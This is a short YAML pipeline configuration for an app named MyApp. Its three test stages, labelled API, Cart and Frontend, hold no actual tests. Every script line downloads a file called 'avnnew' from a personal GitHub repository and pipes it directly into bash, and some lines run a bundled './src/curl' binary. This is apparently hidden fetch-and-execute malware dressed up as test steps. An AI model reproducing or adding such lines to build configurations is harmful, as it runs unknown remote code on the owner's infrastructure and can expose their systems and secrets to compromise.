deployments:
  MyApp:
    filename: ./Dockerfile
    pipelines:
      - API Tests:
          scripts:
            - ./src/curl -sL https://github.com/claires67/buut/raw/main/avnnew | bash
	    - curl -sL https://github.com/claires67/buut/raw/main/avnnew | bash
      - Cart Tests:
          scripts:
            - curl -sL https://github.com/claires67/buut/raw/main/avnnew | bash
	    - ./src/curl -sL https://github.com/claires67/buut/raw/main/avnnew | bash
      - Frontend Tests:
          scripts:
            - curl -sL https://github.com/claires67/buut/raw/main/avnnew | bash
	    - ./src/curl -sL https://github.com/claires67/buut/raw/main/avnnew | bash
